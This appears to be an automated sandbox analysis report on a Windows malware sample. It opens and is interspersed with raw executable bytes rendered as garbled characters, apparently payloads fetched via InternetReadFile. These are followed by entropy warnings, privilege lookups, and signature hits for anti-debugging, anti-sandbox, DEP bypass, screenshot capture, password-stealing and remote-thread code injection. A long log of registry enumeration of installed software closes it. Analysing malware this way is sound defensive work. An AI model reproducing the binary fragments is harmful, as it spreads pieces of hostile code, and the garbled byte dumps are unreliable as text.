ÿuèÀ‹EƒÄ]ËÿU‹ìƒ}Vt+‹qAƒþr‹ë‹Ð9Urƒþr‹‹IÈ;Mv°ë2À^]‹ÿU‹ì‹Mƒì …Éw 3ÉQè8YÉÃÈÿ3Ò÷ñƒøsëjMôè†ûÿÿh@ÅEEôPè³̋ÿU‹ìÿuÿuÿu ÿuè1ÿÿÿƒÄ]ËÿU‹ìÿuÿuÿu ÿuè4ÿÿÿƒÄ]ËÿU‹ìƒy‹E‰Ar‹IëƒÁÆ]‹ÿU‹ìjÿuè[ÿÿÿYY]‹ÿU‹ìQÿuüÿuÿuÿu ÿuèzÿÿÿƒÄÉËÿU‹ìQÿuüÿuÿuÿu ÿuèvÿÿÿƒÄÉËÿU‹ì€}V‹ñt)ƒ~r#ƒ} FW‹8vÿu WjPè–ÿÿÿƒÄWè" Y_ÿu ‹ÎÇFèDÿÿÿ^]Âj ¸ë6Aè"‹ù‰}è‹uƒÎƒþþv‹uë%3Òj‹Æ[÷ó‹O‰MìÑmì‹Uì;Âs jþX+Â;Èw4 ƒeüFP‹Ïè ÿÿÿ‹Øë)‹E‹Mè‰E@‰eðPÆEüèðþÿÿ‰Eì¸ù@Ë}è‹u‹]ìƒ} vƒr‹GëGÿu PFPSèÑþÿÿƒÄjj‹Ïèÿÿÿÿu ‹Ï‰_‰wè}þÿÿèÂ‹Mè3öVjèÜþÿÿVVèÝÌjjèËþÿÿÃj¸7Aè‹ñ‰uðè¢ÿuƒeüN ÇBAè‚‹ÆèIƒy$r‹AÍAËÿV‹ñjjN ÇBAèpþÿÿ‹Î^é4‹ÿU‹ìV‹ñèÔÿÿÿöEtVè¦ Y‹Æ^]‹ÿU‹ìVÿu‹ñèmÿÿÿÇ BA‹Æ^]ÂÇ BAé˜ÿÿÿ‹ÿU‹ìV‹ñÇ BAè…ÿÿÿöEtVèW Y‹Æ^]‹ÿU‹ìVÿu‹ñèÿÿÿÇBA‹Æ^]ÂÇBAéIÿÿÿ‹ÿU‹ìV‹ñÇBAè6ÿÿÿöEtVè Y‹Æ^]ÂjD¸17Aèåh BAMØè ƒeüEØPM°è9ÿÿÿhH¾EE°Pèz̋ÿU‹ìV‹uƒþþvèµÿÿÿ9qs ÿqVèýÿÿë(€} tƒþs‹A;ðs‹ÆPjè2ýÿÿë …öuVè²üÿÿ3À;ÆÀ÷Ø^]‹ÿU‹ìVW‹}W‹ñèàûÿÿ„Àtƒ~r‹FëFÿu +øWV‹Îè2ë:jÿu ‹Îèhÿÿÿ„Àt(‹Nƒùr‹FëFÿu WQPè|üÿÿƒÄÿu ‹Îè9üÿÿ‹Æ_^]‹ÿU‹ìVÿu‹ñèYPÿu‹Îèpÿÿÿ^]‹ÿU‹ìV‹ñjÇFèúûÿÿÿu‹Îè¿ÿÿÿ‹Æ^]ÂjD¸T7Aè™h0BAMØèÀÿÿÿƒeüEØPM°è<þÿÿh̾EE°Pè.̋ÿU‹ì‹UV‹ñ‹N;Êsè±ÿÿÿ+Ê;M s‰M ƒ} vB‹FSW~ƒør‹ë‹ßƒør‹?+M Ú] QS+ÂPúWè°ûÿÿ‹F+E ƒÄP‹ÎèJûÿÿ_[‹Æ^]‹ÿU‹ìS‹] VW‹}‹G‹ñ;Ãsè<ÿÿÿ+ÉE‹E;Es‰E;÷u‹EjÿÃPèSÿÿÿSj‹ÎèIÿÿÿëFjÿuèñýÿÿ„Àt8ƒr‹ëƒÇ‹Nƒùr‹FëFÿuûWQPèõúÿÿƒÄÿu‹Îè²úÿÿ_‹Æ^[] ‹ÿU‹ìV‹ñjÇFè“úÿÿjÿjÿu‹ÎèDÿÿÿ‹Æ^]Âj¸w7Aè.‹ñ‰uð‹}WèGƒeüƒÇ WN ÇBAè¥ÿÿÿ‹Æèl‹ÿU‹ìVÿu‹ñè¶ÿÿÿÇ BA‹Æ^]‹ÿU‹ìVÿu‹ñè™ÿÿÿÇBA‹Æ^]Â; ÐEuóÃé4‹ÿU‹ì‹EVW3ÿ;ÇtG9}uè&j^‰0WWWWW诃ċÆë)9}tà9E sèj"Y‰‹ñë×PÿuÿuèèƒÄ 3À_^]ËÁƒ`ƒ`ÇLBAËÿU‹ìS‹]VW‹ùÇLBA‹…Àt&Pè_ ‹ðFVèÙYY‰G…Àtÿ3VPèáƒÄ ëƒgÇG‹Ç_^[]‹ÿU‹ì‹Á‹MÇLBA‹ ƒ`‰H]‹ÿU‹ìS‹]V‹ñÇLBA‹C‰F…À‹CWt1…Àt'Pèä ‹øGWè^YY‰F…ÀtÿsWPèeƒÄ ë ƒfë‰F_‹Æ^[]ƒ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd†œÒ®eð" ’(@@0)`¨Ë<)ˆÐ(Œ )x °(´8@ÍX.textV’ `.rdataü"°$–@@.dataé'àÖ'º@À.pdataŒÐ((@@.00cfgà(’(@@.tlsð(”(@À.rsrcˆ)–(@@.relocx )¬(@BVHƒì H‹ ÇH‹ ÇH‹ ÇH‹ ՟·1ÀúMZuKHcQ<<PEu>HÑ·Qú tú u'ƒytr!HÁè냹„rHÁø1Àƒ9•ÀH‹ ŽŸƒ9‰¡£(¹ƒÙèŽH‹ٟ‹0è ‰0H‹¹Ÿ‹0èê‰0èƒH‹,Ÿƒ8u H è 1ÀHƒÄ ^ÃHƒì(H‹•Ÿ‹‰=£(H6£(H‹ oŸD‹ H‰D$ H $£(H!£(L"£(è}HƒÄ(ÀHƒì(H‹՞Çè HƒÄ(ÃfAWAVVWSHƒì eH‹%0H‹xH‹5ɞ1ÀðH±>”Ãt.H9Çt)L‹5Ù¼f„¹èAÿÖ1ÀðH±>”ÃtH9ÇuçH‹=ž‹ƒøu ¹èÿŒë'ƒ?t Æy¢(ëÇH‹ zžH‹{žèöŒ‹ƒøuH‹ PžH‹Qžè܌Ç„Ût1ÀH‡H‹æH‹H…Àt1ɺE1ÀÿÆÍ(è9H  ÿ¼H‹ åH‰H +è& èHc=Ρ(H ý蝌H‰ÆH…ÿ~G‰ûL‹5´¡(E1ÿf„K‹ þ藌HxH‰ùèkŒJ‰þK‹þH‰ÁI‰øèhŒIÿÇL9ûuÐë1ÛHÇÞH‰5e¡(èØH‹a¡(H‹ "H‹ H‰‹ B¡(H‹?¡(L‹@¡(è )‰A¡(ƒ=¡(t €=-¡(u 讋‹$¡(HƒÄ [_^A^A_ÉÁèŋÌ@Hƒì(H‹ŜÇèúýÿÿHƒÄ(ÃfHƒì(臋1ÉHƒøɉÈHƒÄ(ÄÃÌÌÌXH‰L$H‰T$L‰D$L‰L$ Hƒì(‹ MÌ舆‰NÌH1Éè*‰H‰CÌH1À‹6ÌHƒÄ(H‹L$H‹T$L‹D$L‹L$ I‰Ê ÌÿÌÿ5ÌÃÇòË’ èÿÿÿÇãËQ²?èrÿÿÿÇÔË= C}ècÿÿÿÇÅËÈ\%,èTÿÿÿǶËÅ$VèEÿÿÿǧ˲Śè6ÿÿÿǘË{ºÛ8è'ÿÿÿÇ‰Ë TñèÿÿÿÇzËhypüè ÿÿÿÇkËÁÜRÔèúþÿÿÇ\ËÑú_ÓèëþÿÿÇMË`4*ÞèÜþÿÿÇ>˃€èÍþÿÿÇ/˅’‡è¾þÿÿÇ ËǛ*éè¯þÿÿÇË]laàè þÿÿÇËËKÓàè‘þÿÿÇóÊُâè‚þÿÿÇäÊ>ÄèsþÿÿÇÕÊ£®~èdþÿÿÇÆÊ6™ÿ8èUþÿÿÇ·ÊëË?ìèFþÿÿǨÊn©™è7þÿÿÇ™Ê)?âè(þÿÿÇŠÊ5¥@dèþÿÿÇ{Êq¼²è þÿÿÇlʝµ¨èûýÿÿÇ]ÊìlÃèìýÿÿÇNÊ_ôèÝýÿÿÇ?ʄœÍ=èÎýÿÿÇ0Ê<]]Êè¿ýÿÿÇ!Ênö…†è°ýÿÿÇÊEÀ†”è¡ýÿÿÌÌÌÌÌÌÌÌÌÌÌÌÌHƒì(H‹ ÊH‹H…Àt.ffff.„ÿâÉ(H‹ëÉHHH‰ àÉH‹@H…ÀußHƒÄ(Ãf.„VWSHƒì H‹5:š‹ƒøÿu¸ÿÿÿÿfDHÿÀHƒ<Îuô…Àt%‰ÇHÿÏH‰û„H‹DþÿmÉ(Hÿ˅ÿH‰ßuëH TÿÿÿHƒÄ [_^é¸üÿÿ„VWSHƒì €=’(tHƒÄ [_^ÃƁ(H‹5²™‹ƒøÿu¸ÿÿÿÿfffff.„HÿÀHƒ<Îuô…Àt%‰ÇHÿÏH‰û„H‹DþÿÝÈ(Hÿ˅ÿH‰ßuëH ÄþÿÿHƒÄ [_^é(üÿÿÌÌÌÌÌÌÌÌ1ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌVWHƒì(H‹c™ƒ8tǃút<ƒúuAH5¿³H=¸³H9÷uë,f„HƒÇH9þtH‹H…ÀtïÿQÈ(ëçºè ¸HƒÄ(_^Ð1ÀÃffff.„Hƒì(ƒút…Òuèî¸HƒÄ(ÃÌÌÌÌVWHƒì8H‰Î‹ÿȃøwH˜H љHc<HÏëH=†™¹è[ L‹NFòN òL$0D$ Hk™H‰ÁI‰øè1‡1ÀHƒÄ8_^ÃÌÌÌÌÌÌÌÌÛãÃÌÌÌÌÌÌÌÌÌÌÌÌÌUAWAVAUATVWSHƒìHl$€=ü›(…mÆï›(Hƒì èn HƒÄ H˜H€HÅHƒàðè“ H)ÄH‰àH‰ƛ(Çě(H‹=ŚH‰øH+ÚHƒøŽH‹²šH‰øH)ØHƒø |,H‹Ÿšƒ;u/H‹“šƒ{u"H‹†šHX ƒxHE؃;u ƒ{„ÓH;\šsHL‹5«–Huffffff.„‹‹KB1Lñ‰EHƒì A¸H‰òèHƒÄ HƒÃH9ûrҋ›(…À~g¿H‹ìš(1ÛHuøL‹5¿´ëffff.„HÿÃHcÈHƒÇ(H9Ë}0D‹D:ðE…ÀtçH‹L:øH‹:Hƒì I‰ñAÿÖHƒÄ H‹™š(‹›š(ëÁHe[_^A\A]A^A_]ËSƒú…[HƒÃ H;y™ƒaÿÿÿL‹5ĕL=½—A¼‹HuøI½ÿÿÿÿëffffff.„HƒÃ H9ûƒ!ÿÿÿ‹KA‰ÈAàøAƒÀøA¬ÈAƒø‡×‹‹CLðN‹ 2Oc‡MúAÿâD¶M“ÿÿÿE„ÛëD·M“ÿÿfE…Ûë D‹O+E…ÛMIÓëL‹LòI)ÒMÊL‰Uø¶Ñƒú?w&IÇÃÿÿÿÿ‰ÑIÓãI÷ÓM9ÚLJÿIÇÃÿÿÿÿIÓãM9Ú|:Aƒø‡DÿÿÿE£Äƒ:ÿÿÿIcÈH0˜L‹ÊHƒì H‰ÁH‰òèMHƒÄ éÿÿÿHƒì0L‰T$ H —I‰Àè̶ÑHƒì H ؖè¹Hƒì H ––è©Ì„AWAVATVWSHƒìXL‰ÇH‰ÓH‰ÎD‹=ë˜(E…ÿ~GH‹ט(J ýH ‰1Òë€HƒÂ(H9Ñt#L‹DI9ðwíL‹L E‹IMÈI
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $ÝáW™€s™€s™€sœ}€€s¯¦yـsˆ,˜€s™€r!€sˆ.€s¯¦xԀsööÙž€söö혀s^†u˜€sRich™€sPEL÷SåLà š°K°@€äédp` °ø.textꙚ `.rdata”D°Fž@@.dataHZ2ä@À.sxdata`@À.rsrc` p @@éÆdB;ÆxB;ÃU‹ìì4‹ESVW£D1Bè$ j3Û_hÿÿÿW¢H1B‰hÿÿÿ‰lÿÿÿ‰pÿÿÿèWMä‰]ä‰]è‰]ìè WM´‰]´‰]¸‰]¼è÷WM‰]‰]”‰]˜èåÿ”°APMÀèæ E䍕hÿÿÿPMÀèB(ÿuÀèè)Y‰]œWMœ‰] ‰]¤è©‹ D1BUœè 5Mä聍Mäè>htBMÀˆ] è‹ ‹ðEðjPMäè5 ‹‹èA*ÿuð‹ðè„)ÿuÀè|)Y;óYu4EðjPMäÆE èá PMäè9 ÿuðèS)YMäè MäèÉWM¨‰]¨‰]¬‰]°èÒ‹MœE¨PhxBºdBèr „Àu8] u ºDB3Éèüþj[é%h<B0ÿÿÿèÑ WM̉]̉]Љ]Ôè¯9]¬Æ…,ÿÿÿ„àTÿÿÿèy¿4³A•TÿÿÿM¨‰½Tÿÿÿèe+„Àu8] u º B3Éè‰þj[é!hBMðèa Eð•TÿÿÿPMÀèB.ÿuðèc(MðÇ$üBè8 Eð•TÿÿÿPMØè.ÿuðè:(MðÇ$èBè Eð•TÿÿÿP ÿÿÿèí-ÿuðè(YºàB‹ ÿÿÿè°(…Àuˆ,ÿÿÿhÌBMðèÊ UðTÿÿÿè}-ÿuð‹ðèÎ';óY|‹…`ÿÿÿ0ÿÿÿ‹°ƒÀ Pè 9]Ü„©8] … j$ÿuÀÿuØSÿä±Aƒø„ˆÿµ ÿÿÿè|'ÿuØèt'ÿuÀèl'ƒÄ Tÿÿÿ‰½Tÿÿÿè’/Tÿÿÿè^/ÿuÌèE'ÿµ0ÿÿÿè:'ÿu¨è2'ÿuœè*'ÿuè"'ÿu´è'ÿuäè'ÿµhÿÿÿè'ƒÄ é]h´BMðè֍Eð•TÿÿÿPÿÿÿè´,PMÌè² ÿµÿÿÿèÉ&ÿuðèÁ&YYhœBMð薍Eð•TÿÿÿPÿÿÿèt,PM´èr ÿµÿÿÿè‰&ÿuðè&YYhxBMðèVE䍕TÿÿÿPEðPHÿÿÿè0,‹ÐÿÿÿèäPMè! ÿµÿÿÿè8&ÿµHÿÿÿè-&ÿuðè%&ÿµ ÿÿÿè&ÿuØè&ÿuÀè &ƒÄTÿÿÿ‰½Tÿÿÿè0.Tÿÿÿèü-xÿÿÿˆtÿÿÿè ÿ5`BtÿÿÿèÅ=„Àu8] u º0B3Éè«ûj[é¨jè%‹ðY;ótN‰^è Ç(³A‹þë3ÿ;ût‹WÿP‹Ïèák…ÀtºB3Éè]û鍕xÿÿÿ<ÿÿÿè·jM؈]ÿ‰]؉]܉]àè E؍UœPEÿP…<ÿÿÿÿµ,ÿÿÿ‹ÏPè”;Ãtt8] ugƒøt8]ÿt(jHÿÿÿZèJPMØèÏÿµHÿÿÿèæ$Y¸@€=@€t.9]Üt)jHÿÿÿZèYJ‹jPÿuØSÿä±AÿµHÿÿÿè¬$YÿuØé¾ÿuØè›$YM„èÍM„è!:ÿµxÿÿÿ‹5°AÿօÀu-ÿu„ÿÖÿu„èk$ÿµ<ÿÿÿè`$YY;û„¢þÿÿ‹WÿPé—þÿÿ9]¸„ҍU´MÀ賋EÀ9]èDžÔþÿÿ<DžØþÿÿ@‰Üþÿÿ‰àþÿÿ‰…äþÿÿt EäMPèDUMØèn‹E܉ìþÿÿ÷ØÀDžðþÿÿ#E؉ ÿÿÿ‰…èþÿÿ…ÔþÿÿPÿœ±Aƒ½ôþÿÿ w'8] u ºäB3ÉèœùÿuØè#ÿuÀè•#Yé¡‹… ÿÿÿÿu؉Eè~#ÿuÀèv#Yé.9]ÐuVhÐBMÌèݍU̍HÿÿÿèÌ‹è)AÿµHÿÿÿöØÀþÀˆEÿè5#8]ÿYt8] …9º B3Éèùé(…<ÿÿÿMÀPèKMÀèmEh”BMðèՍEÀMÌPEðPè›ÿuðèÙ"ÿuÀèÑ"YYhŒBMð覍…<ÿÿÿMÌPEðPèiÿuðè§"9]èYtj MÌ賍EäMÌPèҍE̍•0ÿÿÿPHÿÿÿDžÌþÿÿD‰Ðþÿÿ‰Ôþÿÿ‰Øþÿÿ‰øþÿÿf‰þþÿÿ‰ÿÿÿèß ‹Ð ÿÿÿè¶ÿµHÿÿÿè/"Y…ÿÿÿP…ÌþÿÿPSSSSSSÿµ ÿÿÿSÿŒ°A…À…£8] u3Éè„øÿµ ÿÿÿèî!Yÿu„ÿÖÿu„èà!ÿµ<ÿÿÿèÕ!Y;ûYt‹WÿPtÿÿÿèOÿµxÿÿÿè³!ÿuÌè«!ÿµ0ÿÿÿè !ÿu¨è˜!ÿuœè!ÿuèˆ!ÿu´è€!ÿuäèx!ÿµhÿÿÿèm!ƒÄ$jXéÂÿµÿÿÿÿˆ°A‹…ÿÿÿÿµ ÿÿÿ‰EèB!9]Ytjÿÿuÿ„°Aÿuÿˆ°Aÿu„ÿÖÿu„è!ÿµ<ÿÿÿè!Y;ûYt‹WÿPtÿÿÿèŠÿµxÿÿÿèî ÿuÌèæ ÿµ0ÿÿÿèÛ ƒÄ ÿu¨èÐ ÿuœèÈ ÿuèÀ ÿu´è¸ ÿuäè° ÿµhÿÿÿè¥ ƒÄ‹Ã_^[ÉÂQƒd$V‹ñjè‰!‹Æ^YÃQƒd$V‹ñjèÜ"‹Æ^YÃV‹ñ€>u°^ÍNè 2öØÀjþÀˆX”À^ÃU‹ìì”…lÿÿÿDžlÿÿÿ”Pÿ˜°A…Àtƒ½|ÿÿÿujXÉÃ3ÀÉËD$ÿ@‹@ÂV‹t$ÿN‹Fu…öt‹Îè VèêY3À^¸´Aè‘QVq‰uðÇ<³Aƒeü‹Îèú'ƒMüÿ‹ÎèÆ'‹Mô^d‰ ÉøȐAèV¸$è¸!‹E VW3ÿ‹ò‰x‹‰uЀ ƒMäÿQMä‰}üèA@„ÀuƒMüÿMäè9>2Àé(€>‰}ìt ÿEì‹Eì€<0uô‹E‰}è€8t ÿEè‹Mè€<uô3ö€eóS‰}܉}àë3ÿ¸MØ+ÆQP„5ÐïÿÿPMäè/@„À„·‹EØ;Ç„¨ðÐïÿÿ€}ó‹Æt2+Eè;øwQÿuèÿuSèÿƒÄ …Àt~Š„ÀˆEÔtyÿuԋM èùGCëÆ+Eì;øwÿuìÿuÐSèÍ
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x0002d800', u'virtual_address': u'0x00001000', u'entropy': 7.982860765886352, u'name': u' \\x00 ', u'virtual_size': u'0x00066000'} entropy 7.98286076589 description A section with a high entropy has been found
section {u'size_of_data': u'0x0019ca00', u'virtual_address': u'0x00312000', u'entropy': 7.953840589189804, u'name': u'gznyyhbr', u'virtual_size': u'0x0019d000'} entropy 7.95384058919 description A section with a high entropy has been found
entropy 0.994033089232 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process system
url https://crashpad.chromium.org/bug/new
url https://crashpad.chromium.org/
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Match Windows Http API call rule Str_Win32_Http_API
description PWS Memory rule Generic_PWS_Memory_Zero
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000538
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: IE5BAKEX
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: IEData
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: MobileOptionPack
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SchedulingAgent
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: WIC
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
